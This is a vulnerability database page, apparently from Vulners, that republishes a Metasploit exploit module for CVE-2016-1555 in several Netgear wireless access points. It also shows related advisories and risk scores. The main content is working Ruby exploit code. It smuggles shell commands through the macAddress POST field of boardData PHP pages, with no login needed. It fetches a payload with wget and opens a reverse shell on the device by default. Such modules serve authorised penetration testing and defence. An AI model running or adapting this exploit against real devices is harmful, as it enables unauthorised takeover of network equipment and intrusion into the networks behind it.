Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Netgear Devices - (Unauthenticated) Remote Command Execution (Metasploit)

🗓️ 27 Nov 2018 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 51 Views

Netgear Devices Unauthenticated Remote Command Execution from CVE-2016-1555 page, allowing remote attackers to execute arbitrary commands

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Netgear Unauthenticated Remote Command Execution Exploit
27 Nov 201800:00
zdt
ATTACKERKB		CVE-2016-1555
21 Apr 201700:00
attackerkb
Circl		CVE-2016-1555
26 Nov 201817:56
circl
CISA KEV Catalog		NETGEAR Multiple WAP Devices Command Injection Vulnerability
25 Mar 202200:00
cisa_kev
CNVD		Netgear Multiple Device Authentication Bypass Vulnerability
4 Mar 201600:00
cnvd
Check Point Advisories		Netgear Multiple Products Command Injection (CVE-2016-1555)
9 Oct 201800:00
checkpoint_advisories
CVE		CVE-2016-1555
21 Apr 201715:00
cve
Cvelist		CVE-2016-1555
21 Apr 201715:00
cvelist
Metasploit		Netgear Devices Unauthenticated Remote Command Execution
8 Oct 201803:52
metasploit
Tenable Nessus		NETGEAR Multiple Model PHP Remote Command Injection
22 May 201700:00
nessus
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Netgear Devices Unauthenticated Remote Command Execution',
      'Description' => %q{
        From the CVE-2016-1555 page: (1) boardData102.php, (2) boardData103.php,
        (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in
        Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350,
        WNDAP360, and WNDAP660 before 3.5.5.0 allow remote attackers to execute
        arbitrary commands.
      },
      'Author'      =>
        [
          'Daming Dominic Chen <ddchen[at]cs.cmu.edu>', # Vuln discovery
          'Imran Dawoodjee <imrandawoodjee.infosec[at]gmail.com>' # MSF module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['CVE', '2016-1555'],
          ['URL', 'https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic'],
          ['PACKETSTORM', '135956'],
          ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/112']
        ],
      'DisclosureDate' => 'Feb 25 2016', # According to http://seclists.org/fulldisclosure/2016/Feb/112
      'Privileged'     => true,
      'Platform'       => 'linux',
      'Arch'           => ARCH_MIPSBE,
      'Payload'        => {},
      'DefaultOptions' => {
        'CMDSTAGER::FLAVOR' => 'wget',
        'PAYLOAD'           => 'linux/mipsbe/shell_reverse_tcp',
        'WfsDelay'          => 10 },
      'Targets'        => [['Automatic', { }]],
      'CmdStagerFlavor'=> %w{ echo printf wget },
      'DefaultTarget'  => 0
      ))
      register_options(
      [
        OptString.new('TARGETURI', [true, 'Path of the vulnerable URI.', '/boardDataWW.php']), # boardDataWW.php
        OptString.new('MAC_ADDRESS', [true, 'MAC address to use (default: random)', Rex::Text.rand_text_hex(12)])
      ])
  end

  # check for vulnerability existence
  def check
    fingerprint = Rex::Text.rand_text_alpha(12) # If vulnerability is present, we will get this back in the response
    res = execute_command("echo #{fingerprint}") # the raw POST response

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    unless res.code == 200
      return CheckCode::Safe
    end

    unless res.get_html_document.at('input').to_s.include? fingerprint
      return CheckCode::Safe
    end

    CheckCode::Vulnerable
  end

  # execute a command, or simply send a POST request
  def execute_command(cmd, opts = {})
    vars_post = {
      'macAddress' => "#{datastore['MAC_ADDRESS']};#{cmd};",
      'reginfo' => '1',
      'writeData' => 'Submit'
    }

    send_request_cgi({
      'method'  => 'POST',
      'headers' => { 'Connection' => 'Keep-Alive' },
      'uri'     => normalize_uri(target_uri.path),
      'vars_post' => vars_post
    })
  rescue ::Rex::ConnectionError
    fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the target!")
  end

  # the exploit method
  def exploit
    #run a check before attempting to exploit
    unless [CheckCode::Vulnerable].include? check
      fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!'
    end

    execute_cmdstager(linemax: 2048) # maximum 130,000
  end

end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 Nov 2018 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 3.19.8
CVSS 210
EPSS0.94332
SSVC
netgearunauthenticatedremote command executioncve-2016-1555metasploithttp clientcmdstager
51